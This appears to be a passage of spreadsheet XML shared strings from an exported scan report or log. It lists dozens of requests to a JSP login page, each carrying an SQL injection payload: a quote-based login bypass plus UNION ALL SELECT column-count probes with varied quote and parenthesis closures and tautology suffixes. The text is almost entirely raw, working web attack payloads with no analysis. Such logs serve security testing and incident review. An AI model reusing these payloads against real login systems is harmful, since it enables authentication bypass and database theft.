    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect8435,8435,8435,8435,8435,8435,8435,8435,8435,8435,8435,8435,8435,8435,8435,8435,8435,8435,8435,8435,8435,8435,8435,8435,8435,8435,8435,8435,8435,8435,8435#and((("yocd"like"yocd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect159,159,159,159,159,159,159,159,159,159,159,159,159,159,159,159,159,159,159,159,159,159,159,159,159,159,159,159,159,159,159,159#and((("sdcn"like"sdcn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect3046,3046,3046,3046,3046,3046,3046,3046,3046,3046,3046,3046,3046,3046,3046,3046,3046,3046,3046,3046,3046,3046,3046,3046,3046,3046,3046,3046,3046,3046,3046,3046,3046#and((("qave"like"qave</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect8377,8377,8377,8377,8377,8377,8377,8377,8377,8377,8377,8377,8377,8377,8377,8377,8377,8377,8377,8377,8377,8377,8377,8377,8377,8377,8377,8377,8377,8377,8377,8377,8377,8377#and((("hacz"like"hacz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect5304,5304,5304,5304,5304,5304,5304,5304,5304,5304,5304,5304,5304,5304,5304,5304,5304,5304,5304,5304,5304,5304,5304,5304,5304,5304,5304,5304,5304,5304,5304,5304,5304,5304,5304#and((("dozq"like"dozq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect1263,1263,1263,1263,1263,1263,1263,1263,1263,1263,1263,1263,1263,1263,1263,1263,1263,1263,1263,1263,1263,1263,1263,1263,1263,1263,1263,1263,1263,1263,1263,1263,1263,1263,1263,1263#and((("arbq"like"arbq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952,9952#and((("qeov"like"qeov</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977,8977#and((("dmbl"like"dmbl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345#and((("wtsn"like"wtsn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318,8318#and((("enbi"like"enbi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2147,2147,2147,2147,2147,2147,2147,2147,2147,2147,2147,2147,2147,2147,2147,2147,2147,2147,2147,2147,2147,2147,2147,2147,2147,2147,2147,2147,2147,2147,2147#and"mcoy"like"mcoy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2334,2334,2334,2334,2334,2334,2334,2334,2334,2334,2334,2334,2334,2334,2334,2334,2334,2334,2334,2334,2334,2334,2334,2334,2334,2334,2334,2334,2334,2334,2334,2334#and"qlxz"like"qlxz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4439,4439,4439,4439,4439,4439,4439,4439,4439,4439,4439,4439,4439,4439,4439,4439,4439,4439,4439,4439,4439,4439,4439,4439,4439,4439,4439,4439,4439,4439,4439,4439,4439#and"gvuo"like"gvuo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2528,2528,2528,2528,2528,2528,2528,2528,2528,2528,2528,2528,2528,2528,2528,2528,2528,2528,2528,2528,2528,2528,2528,2528,2528,2528,2528,2528,2528,2528,2528,2528,2528,2528#and"rqvk"like"rqvk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540,9540#and"judh"like"judh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect290,290,290,290,290,290,290,290,290,290,290,290,290,290,290,290,290,290,290,290,290,290,290,290,290,290,290,290,290,290,290,290,290,290,290,290#and"gmnl"like"gmnl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791,2791#and"mudz"like"mudz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect232,232,232,232,232,232,232,232,232,232,232,232,232,232,232,232,232,232,232,232,232,232,232,232,232,232,232,232,232,232,232,232,232,232,232,232,232,232#and"wbfg"like"wbfg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435,3435#and"xqgn"like"xqgn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012,5012#and"gjkh"like"gjkh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#and(4272=4272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#and(85=85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#and(6436=6436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#and(528=528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#and(8786=8786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#and(4485=4485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#and(6154=6154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#and(3821=3821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,null#and(8045=8045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,null,null#and(1485=1485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#and((5937=5937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#and((1801=1801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#and((4033=4033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#and((9516=9516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#and((474=474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#and((2853=2853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,null#and((1092=1092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,null,null#and((4109=410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,null,null,null#and((6897=6897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,null,null,null,null#and((8038=8038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#and(((4160=4160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#and(((2727=2727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#and(((2801=2801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#and(((9582=9582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#and(((5854=5854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#and(((5844=5844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,null#and(((5269=5269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,null,null#and(((9928=9928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,null,null,null#and(((3848=3848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,null,null,null,null#and(((9072=9072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,null,null,null,null#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#and('umfl'='umfl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#and('gqfl'='gqfl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#and('wute'='wute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#and('oslg'='oslg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#and('ynnq'='ynnq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#and('yckj'='yckj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#and('eple'='eple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#and('lwrs'='lwrs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#and('oygb'='oygb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,null#and('nnih'='nnih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#and(('dxzg'='dxzg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#and(('dnyv'='dnyv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#and(('cedi'='cedi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#and(('ndns'='ndns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#and(('qmzr'='qmzr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#and(('qwjp'='qwjp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#and(('xjjb'='xjjb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#and(('rjvb'='rjvb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,null#and(('dwcu'='dwcu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,null,null#and(('ghqh'='ghqh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#and((('clrm'='clrm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#and((('ohlc'='ohlc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#and((('sqot'='sqot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#and((('gnbj'='gnbj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#and((('viuo'='viuo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#and((('hakr'='hakr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#and((('wpql'='wpql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#and((('tqis'='tqis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,null#and((('ptez'='ptez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,null,null#and((('jlby'='jlby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#and'bxxe'='bxxe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#and'koul'='koul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#and'hhfm'='hhfm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#and'xuwx'='xuwx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#and'ffyg'='ffyg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#and'xdkt'='xdkt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#and'bidj'='bidj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#and'qfps'='qfps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#and'chzv'='chzv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,null#and'idnf'='idnf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#and('ifzi'like'ifzi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#and('wgap'like'wgap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#and('qbzo'like'qbzo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#and('jstv'like'jstv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#and('dxfo'like'dxfo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#and('uyek'like'uyek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#and('ozts'like'ozts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#and('yzoa'like'yzoa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#and('pqnf'like'pqnf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,null#and('erpo'like'erpo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#and(('xmfa'like'xmfa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#and(('grgo'like'grgo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#and(('cghw'like'cghw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#and(('nbzj'like'nbzj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#and(('xekc'like'xekc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#and(('uahw'like'uahw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#and(('ketc'like'ketc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#and(('njhd'like'njhd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,null#and(('ahdn'like'ahdn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,null,null#and(('ovjr'like'ovjr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#and((('rtjw'like'rtjw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#and((('grtk'like'grtk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#and((('vtrf'like'vtrf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#and((('bndi'like'bndi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#and((('ymar'like'ymar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#and((('bwou'like'bwou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#and((('yzyp'like'yzyp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#and((('wmvy'like'wmvy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,null#and((('alvf'like'alvf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,null,null#and((('jtut'like'jtut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#and'taim'like'taim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#and'dsie'like'dsie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#and'grnd'like'grnd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#and'svvj'like'svvj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#and'yytz'like'yytz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#and'qcxi'like'qcxi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#and'ljne'like'ljne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#and'qpgr'like'qpgr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#and'dwgy'like'dwgy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,null#and'nlbj'like'nlbj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#and("ofqq"="ofqq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#and("imvz"="imvz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#and("hzfz"="hzfz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#and("tvxd"="tvxd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#and("jkmq"="jkmq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#and("wstr"="wstr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#and("xlqz"="xlqz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#and("qsbj"="qsbj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,null#and("tnum"="tnum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,null,null#and("yyet"="yyet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#and(("oqqk"="oqqk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#and(("ydvg"="ydvg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#and(("jpmq"="jpmq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#and(("hqyz"="hqyz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#and(("bvah"="bvah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#and(("wont"="wont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#and(("yoly"="yoly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#and(("qlll"="qlll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,null#and(("qamj"="qamj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,null,null#and(("lkua"="lkua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#and((("bgaq"="bgaq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#and((("uvsl"="uvsl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#and((("rzua"="rzua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#and((("egjd"="egjd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#and((("ptce"="ptce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#and((("zwfj"="zwfj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#and((("jbdi"="jbdi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#and((("cqss"="cqss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,null#and((("vnet"="vnet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,null,null#and((("lxom"="lxom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#and"uzjk"="uzjk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#and"vceh"="vceh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#and"pbnq"="pbnq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#and"rmtc"="rmtc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#and"klpj"="klpj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#and"hfdg"="hfdg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#and"seqk"="seqk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#and"avci"="avci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#and"csfm"="csfm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,null#and"kgup"="kgup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#and("jtpf"like"jtpf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#and("uhfw"like"uhfw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#and("uwzd"like"uwzd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#and("kxlt"like"kxlt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#and("drex"like"drex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#and("tylf"like"tylf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#and("qrqb"like"qrqb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#and("fhuz"like"fhuz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,null#and("xyqi"like"xyqi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,null,null#and("lvlq"like"lvlq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#and(("krdi"like"krdi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#and(("pueq"like"pueq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#and(("rglz"like"rglz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#and(("klsk"like"klsk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#and(("ufkn"like"ufkn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#and(("lacd"like"lacd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#and(("lbnj"like"lbnj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#and(("zvjl"like"zvjl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,null#and(("ywfl"like"ywfl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,null,null#and(("nywm"like"nywm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#and((("jwsk"like"jwsk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#and((("vnpi"like"vnpi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#and((("mefc"like"mefc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#and((("abbc"like"abbc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#and((("lxtw"like"lxtw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#and((("tssd"like"tssd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#and((("vttg"like"vttg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#and((("ugab"like"ugab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,null#and((("twaf"like"twaf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,null,null#and((("yzbf"like"yzbf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#and"ioal"like"ioal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#and"eiig"like"eiig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#and"qcsh"like"qcsh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#and"axkt"like"axkt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#and"lkuz"like"lkuz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#and"uzpx"like"uzpx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#and"uzky"like"uzky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#and"aidd"like"aidd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#and"dudi"like"dudi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,null#and"qmze"like"qmze</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916,3916#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729,1729#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653,5653#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521,1521#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779,7779#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873,6873#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438,1438#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581,7581#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484,6484#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect922,922,922,922,922,922,922,922,922,922,922,922,922,922,922,922,922,922,922,922,922,922,922,922,922,922,922,922,922,922,922,922,922,922,922,922,922,922,922,922,922#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85,85#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613,9613#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997,997#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077,1077#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979,8979#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361,1361#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963,3963#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319,1319#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139,7139#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856,3856#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513,4513#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547,6547#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361,361#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608,1608#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671,7671#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506,6506#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026,7026#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858,5858#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834,1834#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330,6330#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560,4560#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869,2869#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262,9262#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999,5999#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105,105#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169,4169#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104,6104#</t>
  </si>
  <si>
